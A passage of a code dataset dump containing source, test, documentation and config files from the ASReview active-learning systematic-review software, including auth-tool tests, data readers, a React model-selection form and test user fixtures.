get_auth_tool_object(Namespace(json=None))\n # run function\n auth_tool.list_projects()\n out, _ = capsys.readouterr()\n # we have already tested _print_project, so I will keep\n # it short\n assert f\"* {data1['id']}\" in out\n assert f\"* {data2['id']}\" in out\n assert f\"name: {data1['name']}\" in out\n assert f\"name: {data2['name']}\" in out\n\n\n# Test list projects: output is a json string\ndef test_list_projects_with_json(client_no_auth, capsys):\n # create two projects\n _, data1 = au.create_project(client_no_auth, \"test1\")\n _, data2 = au.create_project(client_no_auth, \"test2\")\n data = {\n data1.get(\"id\"): data1,\n data2.get(\"id\"): data2\n }\n # get auth_tool object\n auth_tool = get_auth_tool_object(Namespace(json=True))\n # run function\n auth_tool.list_projects()\n out, _ = capsys.readouterr()\n # this loads the out json string into a list of dicts\n out = json.loads(json.loads(out))\n assert isinstance(out, list)\n assert len(out) == 2\n for proj in out:\n expected = data[proj[\"project_id\"]]\n assert proj[\"folder\"] == expected[\"id\"]\n assert proj[\"version\"] == expected[\"version\"]\n assert proj[\"project_id\"] == expected[\"id\"]\n assert proj[\"name\"] == expected[\"name\"]\n assert proj[\"authors\"] == expected[\"authors\"]\n assert proj[\"created\"] == expected[\"datetimeCreated\"]\n assert proj[\"owner_id\"] == 0\n\n\n# Test linking projects to users with a json string\n# Note: We can not simulate a conversion from an unauthenticated\n# app into an authenticated one. To overcome this problem, 2 old\n# project zip files (version 0.x) are copied from Github into the\n# asreview folder and upgraded. This is done without the help of\n# the API, ensuring they can't be linked to a User account.\ndef test_link_project_with_json_string(client_auth, capsys):\n # import projects\n proj1, proj2 = import_2_unauthenticated_projects()\n # create 2 users\n user1 = crud.create_user(DB, 1)\n user2 = crud.create_user(DB, 2)\n # check database\n assert crud.count_users() == 2\n assert crud.count_projects() == 0\n # check if we have 2 folders in asreview path\n assert len(misc.get_folders_in_asreview_path()) == 2\n # get from the auth tool a json string\n auth_tool = get_auth_tool_object(Namespace(json=True))\n auth_tool.list_projects()\n out, _ = capsys.readouterr()\n # we replace the owner ids with the ids of the users\n json_string = out.replace(\": 0\", f\": {user1.id}\", 1)\n json_string = json_string.replace(\": 0\", f\": {user2.id}\", 1)\n\n # use this string to run the function with a new AuthTool\n auth_tool = get_auth_tool_object(Namespace(json=json.loads(json_string)))\n auth_tool.link_projects()\n # check database and check if the users own the correct project\n assert crud.count_projects() == 2\n project_dict = {\n proj[\"owner_id\"]: proj\n for proj in json.loads(json.loads(json_string))\n }\n for user in [user1, user2]:\n expected_proj = project_dict[user.id]\n assert len(user.projects) == 1\n assert user.projects[0].project_id == expected_proj[\"folder\"]\n assert user.projects[0].project_id == expected_proj[\"project_id\"]\n # check also on the file-system\n assert Path(asreview_path() / expected_proj[\"folder\"]).exists()\n\n\n# Test linking projects interactively\ndef test_link_projects_interactively(client_auth):\n # import projects\n proj1, proj2 = import_2_unauthenticated_projects()\n project_data = {p.config.get(\"id\"): p for p in [proj1, proj2]}\n # create a user\n user = crud.create_user(DB, 1)\n # check the database\n assert crud.count_users() == 1\n assert crud.count_projects() == 0\n # create AuthTool object\n auth_tool = get_auth_tool_object(Namespace(json=None))\n # run function with patched input\n with patch('builtins.input', side_effect=[user.id, user.id]):\n # link project to user\n auth_tool.link_projects()\n # check database again\n assert crud.count_projects() == 2\n # make sure the user has 2 different projects\n assert len([p.project_id for p in user.projects]) == 2\n # check user projects\n for project in user.projects:\n org_data = project_data[project.project_id]\n assert org_data.config.get(\"id\") == project.project_id\n assert Path(asreview_path() / project.project_id).exists()\n\n\n# Test linking projects with a typo\ndef test_link_projects_interactively_with_typo(client_auth):\n # import projects\n proj1, proj2 = import_2_unauthenticated_projects()\n # create a user\n user = crud.create_user(DB, 1)\n # check the database\n assert crud.count_users() == 1\n assert crud.count_projects() == 0\n # create AuthTool object\n auth_tool = get_auth_tool_object(Namespace(json=None))\n # run function with patched input (there is a wrong id in there)\n with patch('builtins.input', side_effect=[user.id, str(-5), user.id]):\n # link project to user\n auth_tool.link_projects()\n # check database again\n assert crud.count_projects() == 2\n\n\n# Test failure of anything related to projects if a project is older\n# than version 0.x.\[email protected](\n \"method\",\n [\n \"_generate_project_links\",\n \"list_projects\",\n \"link_projects\"\n ]\n)\ndef test_projects_with_0x_projects(client_auth, method):\n # import projects\n proj1, proj2 = import_2_unauthenticated_projects(with_upgrade=False)\n # make sure these projects exist\n assert len(misc.get_folders_in_asreview_path()) == 2\n # create AuthTool object\n auth_tool = get_auth_tool_object(Namespace(json=None))\n # try to link project to user\n with pytest.raises(RuntimeError) as error:\n func = getattr(auth_tool, method)\n func()\n assert \"Version of project with id\" in str(error.value)\n assert \"too old\" in str(error.value)\n" }, { "alpha_fraction": 0.6112614870071411, "alphanum_fraction": 0.6210070252418518, "avg_line_length": 30.305084228515625, "blob_id": "29bc44e1f92286e80c45c37a53eeb16e2046aea0", "content_id": "1afe315d0f81b7bac49f734a05f5c613197a7485", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1847, "license_type": "permissive", "max_line_length": 75, "num_lines": 59, "path": "/asreview/io/excel_reader.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport pandas as pd\n\nfrom asreview.config import COLUMN_DEFINITIONS\nfrom asreview.io.utils import _standardize_dataframe\n\n\nclass ExcelReader:\n \"\"\"Excel file reader.\"\"\"\n\n read_format = [\".xlsx\"]\n write_format = [\".csv\", \".tsv\", \".xlsx\"]\n\n @classmethod\n def read_data(cls, fp):\n \"\"\"Import dataset.\n\n Arguments\n ---------\n fp: str, pathlib.Path\n File path to the Excel file (.xlsx).\n\n Returns\n -------\n list:\n List with entries.\n \"\"\"\n try:\n dfs = pd.read_excel(fp, sheet_name=None)\n except UnicodeDecodeError:\n dfs = pd.read_excel(fp, sheet_name=None, encoding=\"ISO-8859-1\")\n\n best_sheet = None\n sheet_obj_val = -1\n wanted_columns = []\n for type_name, type_list in COLUMN_DEFINITIONS.items():\n wanted_columns.extend(type_list)\n\n for sheet_name in dfs:\n col_names = set([col.lower() for col in list(dfs[sheet_name])])\n obj_val = len(col_names & set(wanted_columns))\n if obj_val > sheet_obj_val:\n sheet_obj_val = obj_val\n best_sheet = sheet_name\n\n return _standardize_dataframe(dfs[best_sheet])\n" }, { "alpha_fraction": 0.7963235378265381, "alphanum_fraction": 0.8051470518112183, "avg_line_length": 44.33333206176758, "blob_id": "0d9bd0f6769710c8181cc94a07e310ce13f1e471", "content_id": "ad19dacb4bbfc416464a94a248cf789de101172d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1360, "license_type": "permissive", "max_line_length": 74, "num_lines": 30, "path": "/asreview/models/query/__init__.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom asreview.models.query.cluster import ClusterQuery\nfrom asreview.models.query.max import MaxQuery\nfrom asreview.models.query.mixed import MaxRandomQuery\nfrom asreview.models.query.mixed import MaxUncertaintyQuery\nfrom asreview.models.query.mixed import MixedQuery\nfrom asreview.models.query.random import RandomQuery\nfrom asreview.models.query.uncertainty import UncertaintyQuery\nfrom asreview.models.query.utils import get_query_class\nfrom asreview.models.query.utils import get_query_model\nfrom asreview.models.query.utils import list_query_strategies\n\n\"\"\"Query strategies query records to label by the user.\n\nThere are several query strategies available. In configuration files,\nparameters are found under the section ``[query_param]``.\n\"\"\"\n" }, { "alpha_fraction": 0.6611279249191284, "alphanum_fraction": 0.6681772470474243, "avg_line_length": 30.03125, "blob_id": "04afc97931b3965069bba89bdccce2672a581ca3", "content_id": "554d6ed8cca041775cd4a1d719d22f9d3e1393fc", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1986, "license_type": "permissive", "max_line_length": 75, "num_lines": 64, "path": "/asreview/entry_points/state_inspect.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport argparse\nfrom pathlib import Path\n\nimport pandas as pd\n\nfrom asreview.entry_points.base import BaseEntryPoint\nfrom asreview.project import get_project_path\nfrom asreview.project import open_state\n\n\ndef _parse_state_inspect_args():\n # parse arguments if available\n parser = argparse.ArgumentParser(\n prog=\"state-inspect\", description=\"Inspect state file.\"\n )\n parser.add_argument(\n \"project_id\", type=str, help=\"Project_id or path to ASReview file.\"\n )\n parser.add_argument(\n \"table\",\n type=str,\n help=\"Table to view (e.g. results, record_table, last_ranking).\",\n )\n\n return parser\n\n\nclass StateInspectEntryPoint(BaseEntryPoint):\n \"\"\"Entry point to inspect ASReview LAB review progress.\"\"\"\n\n def execute(self, argv):\n parser = _parse_state_inspect_args()\n args = parser.parse_args(argv)\n\n if Path(args.project_id).suffix == \".asreview\":\n project_path = args.project_id\n else:\n project_path = get_project_path(args.project_id)\n\n with open_state(project_path) as s:\n conn = s._connect_to_sql()\n\n df = pd.read_sql(f\"select * from {args.table}\", conn)\n\n if args.table == \"results\":\n df[\"label\"] = df[\"label\"].astype(pd.Int64Dtype())\n\n print(f\"Table '{args.table}':\\n\")\n print(df)\n print(\"\\n\")\n" }, { "alpha_fraction": 0.7463738322257996, "alphanum_fraction": 0.7484459280967712, "avg_line_length": 37.91935348510742, "blob_id": "6435138e6718f704faf61de5bac4f77f3b8c8ac2", "content_id": "d46cbee0c41adcd9c7374a5f5e7ba3ce3774c979", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2413, "license_type": "permissive", "max_line_length": 135, "num_lines": 62, "path": "/docs/source/overview_development.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Overview\n========\n\nThe development section is meant for users that need advanced functions of\nASReview LAB and for developers. It contains technical information on the\nusage, instructions for developing extensions, and an extensive API reference.\n\nASReview architecture\n---------------------\n\nASReview provides users an API to interact directly with the underlying ASReview\nmachinery. This provides researchers an interface to study the behavior of\nalgorithms and develop custom workflows. The following overview shows the\navailable interfaces for interacting with the ASReview software:\n\n..\n Source file of image can be found at\n https://github.com/asreview/asreview-artwork/tree/master/LayerOverview\n\n.. figure:: ../figures/asreview_layers_light_no_BG.png\n :alt: ASReview API\n\n\n* Layer 5: ASReview CLOUD\n\n - ASReview is currently in development. For information on ASReview CLOUD,\n be sure visit our communication channels.\n\n* Layer 4: :doc:`ASReview LAB <project_create>`\n\n - ASReview LAB is the user friendly webapp and all underlying\n interfaces. Documentation on LAB\n can be found in the :doc:`ASReview LAB section <project_create>`.\n\n* Layer 3: REST API\n\n - The REST API uses a Flask REST API to provide a method to let the React\n webapp communicate with the backend and algorithms. The REST API is not\n documented and should be considered 'internal use only'.\n\n* Layer 2: :doc:`cli`\n\n - The Command Line is an interface used to open ASReview LAB, run\n simulations, and run :doc:`Subcommand extensions <extensions_dev>` for ASReview. This development section documents all available\n command line options for both :doc:`ASReview LAB <start>` and :doc:`simulation mode <simulation_cli>`.\n\n* Layer 1: :doc:`reference`\n\n - The ASReview API is a low level Python interface for ASReview. This\n interface requires detailed knowledge about the workings of the software.\n This reference contains extensive documentation on all functions, classes,\n and modules found in ASReview.\n\n - An outline for usage can be found in :doc:`../simulation_api_example` and :doc:`example_api_asreview_file`.\n\nExtensions\n----------\n\n:doc:`The Create an extension <extensions_dev>` section documents the creation\nof model, subcommand, and dataset extensions for ASReview. More information on\nextensions can be found in the extension\n:doc:`extensions_overview`.\n" }, { "alpha_fraction": 0.5070277452468872, "alphanum_fraction": 0.5082619190216064, "avg_line_length": 33.56161117553711, "blob_id": "c3722e9e2ec686286d636808b987de1fb01fc88c", "content_id": "3279c47374f68a8f23bb0cdc8433e44c270f743c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 14585, "license_type": "permissive", "max_line_length": 167, "num_lines": 422, "path": "/asreview/webapp/src/ProjectComponents/SetupComponents/ModelComponents/ModelForm.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useQuery, useQueryClient } from \"react-query\";\nimport { connect } from \"react-redux\";\nimport {\n Box,\n CircularProgress,\n FormControl,\n FormHelperText,\n InputLabel,\n Link,\n MenuItem,\n Select,\n Stack,\n Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport { InlineErrorHandler } from \"../../../Components\";\nimport { SelectItem } from \"../../../ProjectComponents\";\nimport { InfoCard } from \"../../SetupComponents\";\nimport { ProjectAPI } from \"../../../api/index.js\";\nimport { defaultAlgorithms, mapStateToProps } from \"../../../globals.js\";\n\nconst requirements = [\n {\n value: \"tensorflow\",\n link: \"https://asreview.readthedocs.io/en/latest/API/generated/asreview.models.classifiers.NN2LayerClassifier.html#asreview-models-classifiers-nn2layerclassifier\",\n },\n {\n value: \"gensim\",\n link: \"https://asreview.readthedocs.io/en/latest/API/generated/asreview.models.feature_extraction.Doc2Vec.html#asreview-models-feature-extraction-doc2vec\",\n },\n {\n value: \"sentence-transformers\",\n link: \"https://asreview.readthedocs.io/en/latest/API/generated/asreview.models.feature_extraction.SBERT.html#asreview-models-feature-extraction-sbert\",\n },\n];\n\nconst modelRequirement = (requirement) => {\n let link = requirements\n .filter((element) => element.value === requirement)\n .map((element) => element.link);\n return (\n <React.Fragment>\n requires <code>{requirement}</code> to be installed.{\" \"}\n <Link underline=\"none\" href={link} target=\"_blank\">\n Learn more\n </Link>{\" \"}\n </React.Fragment>\n );\n};\n\nconst PREFIX = \"ModelForm\";\n\nconst classes = {\n title: `${PREFIX}-title`,\n loading: `${PREFIX}-loading`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n [`& .${classes.title}`]: {\n paddingBottom: 16,\n },\n\n [`& .${classes.loading}`]: {\n display: \"flex\",\n justifyContent: \"center\",\n },\n}));\n\nconst ModelForm = (props) => {\n const queryClient = useQueryClient();\n const {\n data: modelOptions,\n error: fetchModelOptionsError,\n isError: isFetchModelOptionsError,\n isFetched: isFetchedModelOptions,\n isFetching: isFetchingModelOptions,\n isSuccess: isSuccessModelOptions,\n } = useQuery(\"fetchModelOptions\", ProjectAPI.fetchModelOptions, {\n refetchOnWindowFocus: false,\n });\n\n const {\n error: fetchModelConfigError,\n isError: isFetchModelConfigError,\n isFetched: isFetchedModelConfig,\n isFetching: isFetchingModelConfig,\n isSuccess: isSuccessModelConfig,\n } = useQuery(\n [\"fetchModelConfig\", { project_id: props.project_id }],\n ProjectAPI.fetchModelConfig,\n {\n enabled: props.project_id !== null,\n onSuccess: (data) => {\n props.setModel({\n classifier: data[\"model\"],\n query_strategy: data[\"query_strategy\"],\n balance_strategy: data[\"balance_strategy\"],\n feature_extraction: data[\"feature_extraction\"],\n });\n },\n refetchOnWindowFocus: false,\n },\n );\n\n const handleModel = (event) => {\n if (event.target.name === \"classifier\") {\n if (\n event.target.value === \"lstm-base\" ||\n event.target.value === \"lstm-pool\"\n ) {\n props.setModel({\n ...props.model,\n classifier: event.target.value,\n feature_extraction: \"embedding-lstm\",\n });\n } else {\n if (props.model?.feature_extraction === \"embedding-lstm\") {\n props.setModel({\n ...props.model,\n classifier: event.target.value,\n feature_extraction: defaultAlgorithms[\"feature_extraction\"],\n });\n } else {\n props.setModel({\n ...props.model,\n classifier: event.target.value,\n });\n }\n }\n }\n if (event.target.name === \"query_strategy\") {\n props.setModel({\n ...props.model,\n query_strategy: event.target.value,\n });\n }\n if (event.target.name === \"balance_strategy\") {\n props.setModel({\n ...props.model,\n balance_strategy: event.target.value,\n });\n }\n if (event.target.name === \"feature_extraction\") {\n props.setModel({\n ...props.model,\n feature_extraction: event.target.value,\n });\n }\n };\n\n const returnRequirement = () => {\n return (\n <React.Fragment>\n Some combinations take a long time to warm up. Some classifiers and\n feature extraction techniques require additional dependencies.{\" \"}\n {(props.model?.classifier === \"nn-2-layer\" ||\n props.model?.feature_extraction === \"embedding-idf\" ||\n props.model?.feature_extraction === \"embedding-lstm\") && (\n <React.Fragment>\n {props.model?.feature_extraction === \"tfidf\" &&\n \"This combination might crash on some systems with limited memory. \"}\n {props.model?.classifier === \"nn-2-layer\" &&\n modelOptions?.classifier\n .filter((e) => e.name === \"nn-2-layer\")\n .map((e) => e.label) + \" \"}\n {props.model?.feature_extraction === \"embedding-idf\" &&\n modelOptions?.feature_extraction\n .filter((e) => e.name === \"embedding-idf\")\n .map((e) => e.label) + \" \"}\n {props.model?.feature_extraction === \"embedding-lstm\" &&\n modelOptions?.feature_extraction\n .filter((e) => e.name === \"embedding-lstm\")\n .map((e) => e.label) + \" \"}\n {modelRequirement(\"tensorflow\")}\n </React.Fragment>\n )}\n {props.model?.feature_extraction === \"doc2vec\" && (\n <React.Fragment>\n {modelOptions?.feature_extraction\n .filter((e) => e.name === \"doc2vec\")\n .map((e) => e.label)}{\" \"}\n {modelRequirement(\"gensim\")}\n </React.Fragment>\n )}\n {props.model?.feature_extraction === \"sbert\" && (\n <React.Fragment>\n {modelOptions?.feature_extraction\n .filter((e) => e.name === \"sbert\")\n .map((e) => e.label)}{\" \"}\n {modelRequirement(\"sentence-transformers\")}\n </React.Fragment>\n )}\n </React.Fragment>\n );\n };\n\n const disableClassifierItem = (value) => {\n return value === \"nb\" && props.model?.feature_extraction === \"doc2vec\";\n };\n\n const disableFeatureExtractionItem = (value) => {\n return (\n (value === \"doc2vec\" && props.model?.classifier === \"nb\") ||\n (props.model?.classifier !== \"lstm-base\" &&\n props.model?.classifier !== \"lstm-pool\" &&\n value === \"embedding-lstm\") ||\n ((props.model?.classifier === \"lstm-base\" ||\n props.model?.classifier === \"lstm-pool\") &&\n value !== \"embedding-lstm\")\n );\n };\n\n const returnQueryStrategyHelperText = () => {\n if (props.model?.query_strategy === \"random\") {\n return \"Your review is not accelerated by the model\";\n }\n };\n\n const returnModelError = () => {\n if (isFetchModelOptionsError && !isFetchModelConfigError) {\n return fetchModelOptionsError?.message;\n }\n if (isFetchModelConfigError && !isFetchModelOptionsError) {\n return fetchModelConfigError?.message;\n }\n if (isFetchModelOptionsError && isFetchModelConfigError) {\n return (\n fetchModelOptionsError?.message + \" \" + fetchModelConfigError?.message\n );\n }\n };\n\n const refetchModel = () => {\n if (isFetchModelOptionsError) {\n queryClient.resetQueries(\"fetchModelOptions\");\n }\n if (isFetchModelConfigError) {\n queryClient.resetQueries(\"fetchModelConfig\");\n }\n };\n\n const resetMutateModelConfig = () => {\n queryClient.invalidateQueries(\"fetchModelConfig\");\n props.reset();\n };\n\n return (\n <Root>\n <Box className={classes.title}>\n <Typography variant=\"h6\">Model</Typography>\n <Typography variant=\"body2\" sx={{ color: \"text.secondary\" }}>\n An active learning model consists of a feature extraction technique, a\n classifier, a query strategy, and a balance strategy. The default\n setup (TF-IDF, Naive Bayes, Maximum, Dynamic resampling) overall has\n fast and excellent performance.{\" \"}\n <Link\n underline=\"none\"\n href={`https://asreview.nl/blog/active-learning-explained/`}\n target=\"_blank\"\n >\n Learn more\n </Link>\n </Typography>\n </Box>\n {returnRequirement() && <InfoCard info={returnRequirement()} />}\n <Stack spacing={3} sx={{ mt: 3 }}>\n {(isFetchingModelOptions || isFetchingModelConfig) && (\n <Box className={classes.loading}>\n <CircularProgress />\n </Box>\n )}\n {!isFetchModelOptionsError &&\n !isFetchModelConfigError &&\n !isFetchingModelOptions &&\n !isFetchingModelConfig &&\n isFetchedModelOptions &&\n isFetchedModelConfig &&\n isSuccessModelOptions &&\n isSuccessModelConfig && (\n <Box component=\"form\" noValidate autoComplete=\"off\">\n <Stack direction=\"column\" spacing={3}>\n <FormControl fullWidth>\n <InputLabel id=\"feature-extraction-select-label\">\n Feature extraction technique\n </InputLabel>\n <Select\n id=\"select-feature-extraction\"\n name=\"feature_extraction\"\n label=\"Feature extraction technique\"\n value={props.model?.feature_extraction}\n onChange={handleModel}\n >\n {modelOptions?.feature_extraction.map((value) => {\n return (\n <MenuItem\n key={`result-item-${value.name}`}\n checked={\n props.model?.feature_extraction === value.name\n }\n value={value.name}\n disabled={disableFeatureExtractionItem(value.name)}\n >\n <SelectItem\n primary={value.label}\n secondary={value.description}\n />\n </MenuItem>\n );\n })}\n </Select>\n </FormControl>\n <FormControl fullWidth>\n <InputLabel id=\"classifier-select-label\">\n Classifier\n </InputLabel>\n <Select\n labelId=\"select-classifier-label\"\n id=\"select-classifier\"\n name=\"classifier\"\n label=\"Classifier\"\n value={props.model?.classifier}\n onChange={handleModel}\n >\n {modelOptions?.classifier.map((value) => {\n return (\n <MenuItem\n key={`result-item-${value.name}`}\n checked={props.model?.classifier === value.name}\n value={value.name}\n disabled={disableClassifierItem(value.name)}\n >\n <SelectItem\n primary={value.label}\n secondary={value.description}\n />\n </MenuItem>\n );\n })}\n </Select>\n </FormControl>\n <FormControl fullWidth>\n <InputLabel id=\"query-strategy-select-label\">\n Query strategy\n </InputLabel>\n <Select\n id=\"select-query-strategy\"\n name=\"query_strategy\"\n label=\"Query strategy\"\n value={props.model?.query_strategy}\n onChange={handleModel}\n >\n {modelOptions?.query_strategy.map((value) => {\n return (\n <MenuItem\n key={`result-item-${value.name}`}\n checked={props.model?.query_strategy === value.name}\n value={value.name}\n >\n <SelectItem\n primary={value.label}\n secondary={value.description}\n />\n </MenuItem>\n );\n })}\n </Select>\n <FormHelperText>\n {returnQueryStrategyHelperText()}\n </FormHelperText>\n </FormControl>\n <FormControl fullWidth>\n <InputLabel id=\"balance-strategy-select-label\">\n Balance strategy\n </InputLabel>\n <Select\n id=\"select-balance-strategy\"\n name=\"balance_strategy\"\n label=\"Balance strategy\"\n value={props.model?.balance_strategy}\n onChange={handleModel}\n >\n {modelOptions?.balance_strategy.map((value) => {\n return (\n <MenuItem\n key={`result-item-${value.name}`}\n checked={props.model?.balance_strategy === value.name}\n value={value.name}\n >\n <SelectItem\n primary={value.label}\n secondary={value.description}\n />\n </MenuItem>\n );\n })}\n </Select>\n </FormControl>\n </Stack>\n </Box>\n )}\n {(isFetchModelOptionsError || isFetchModelConfigError) && (\n <InlineErrorHandler\n message={returnModelError()}\n refetch={refetchModel}\n button={true}\n />\n )}\n {props.isMutateModelConfigError && (\n <InlineErrorHandler\n message={props.mutateModelConfigError?.message}\n refetch={resetMutateModelConfig}\n button={true}\n />\n )}\n </Stack>\n </Root>\n );\n};\n\nexport default connect(mapStateToProps)(ModelForm);\n" }, { "alpha_fraction": 0.7412199378013611, "alphanum_fraction": 0.7523105144500732, "avg_line_length": 32.8125, "blob_id": "3339e700a026a2cd36475085f959fbc99777b1f7", "content_id": "adc1b0ce8cc8d43447c44b3d97088d4de31209f0", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1082, "license_type": "permissive", "max_line_length": 74, "num_lines": 32, "path": "/asreview/entry_points/lab.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom asreview.entry_points.base import BaseEntryPoint\nfrom asreview.webapp.run_model import main as main_run_model\nfrom asreview.webapp.start_flask import main as main_flask\n\n\nclass LABEntryPoint(BaseEntryPoint):\n \"\"\"Entry point to start the ASReview LAB webapp.\"\"\"\n\n def execute(self, argv):\n\n main_flask(argv)\n\n\nclass WebRunModelEntryPoint(BaseEntryPoint):\n description = \"Internal use only.\"\n\n def execute(self, argv):\n main_run_model(argv)\n" }, { "alpha_fraction": 0.6607362031936646, "alphanum_fraction": 0.6644172072410583, "avg_line_length": 27.10344886779785, "blob_id": "263dd7b7218ef6d6f7cca7f59ad3067db9c08e95", "content_id": "d575a300b3d23fb8636aae4e831067bce1b0a25b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3260, "license_type": "permissive", "max_line_length": 84, "num_lines": 116, "path": "/asreview/webapp/io.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport logging\nimport os\nimport pickle\nfrom pathlib import Path\n\nimport pandas as pd\n\nfrom asreview._version import get_versions\nfrom asreview.data import ASReviewData\nfrom asreview.project import ProjectNotFoundError\nfrom asreview.project import is_project\n\n\nclass CacheDataError(Exception):\n pass\n\n\ndef _get_cache_data_path(fp_data):\n return Path(fp_data).with_suffix(fp_data.suffix + \".pickle\")\n\n\ndef _read_data_from_cache(fp_data, version_check=True):\n fp_data_pickle = _get_cache_data_path(fp_data)\n\n try:\n # get the pickle data\n with open(fp_data_pickle, \"rb\") as f_pickle_read:\n data_obj, data_obj_version = pickle.load(f_pickle_read)\n\n # validate data object\n if not isinstance(data_obj.df, pd.DataFrame):\n raise ValueError()\n\n # drop cache files generated by older versions\n if (not version_check) or (get_versions()[\"version\"] == data_obj_version):\n return data_obj\n\n except FileNotFoundError:\n # file not available\n pass\n except Exception as err:\n # problem loading pickle file or outdated\n # remove the pickle file\n logging.error(f\"Error reading cache file: {err}\")\n try:\n os.remove(fp_data_pickle)\n except FileNotFoundError:\n pass\n\n raise CacheDataError()\n\n\ndef _write_data_to_cache(fp_data, data_obj):\n fp_data_pickle = _get_cache_data_path(fp_data)\n\n logging.info(\"Store a copy of the data in a pickle file.\")\n with open(fp_data_pickle, \"wb\") as f_pickle:\n pickle.dump((data_obj, get_versions()[\"version\"]), f_pickle)\n\n\ndef read_data(project, use_cache=True, save_cache=True):\n \"\"\"Get ASReviewData object from file.\n\n Parameters\n ----------\n project_path: str, iterable\n The project identifier.\n use_cache: bool\n Use the pickle file if available.\n save_cache: bool\n Save the file to a pickle file if not available.\n\n Returns\n -------\n ASReviewData:\n The data object for internal use in ASReview.\n\n \"\"\"\n\n if not is_project(project.project_path):\n raise ProjectNotFoundError()\n\n try:\n fp_data = Path(project.project_path, \"data\", project.config[\"dataset_path\"])\n except Exception:\n raise FileNotFoundError(\"Dataset not found\")\n\n # use cache file\n if use_cache:\n try:\n return _read_data_from_cache(fp_data)\n except CacheDataError:\n pass\n\n # load from file\n data_obj = ASReviewData.from_file(fp_data)\n\n # save a pickle version\n if save_cache:\n _write_data_to_cache(fp_data, data_obj)\n\n return data_obj\n" }, { "alpha_fraction": 0.7543859481811523, "alphanum_fraction": 0.780701756477356, "avg_line_length": 12.411765098571777, "blob_id": "aafe6d8b4e388edd4fc1d32964422066f87129bf", "content_id": "cfe47f5112dacec3eb3447e1d6381c329a60c341", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 228, "license_type": "permissive", "max_line_length": 21, "num_lines": 17, "path": "/asreview/webapp/tests/config/asreview.ini", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "[user1]\[email protected]\nname=user1\naffiliation=Utrecht\npassword=1234User1!\n\n[user2]\[email protected]\nname=user2\naffiliation=Amsterdam\npassword=1234User2!\n\n[user3]\[email protected]\nname=user3\naffiliation=Eindhoven\npassword=1234User3!\n" }, { "alpha_fraction": 0.5339204668998718, "alphanum_fraction": 0.5347914695739746, "avg_line_length": 30.793846130371094, "blob_id": "5ce914b430655892330bd0747768d3afc66ff15e", "content_id": "1d624ca787c5d95ae2a7b105a94537f2fc5c362b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10333, "license_type": "permissive", "max_line_length": 114, "num_lines": 325, "path": "/asreview/entry_points/auth_tool.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import argparse\nimport json\nimport sys\nfrom 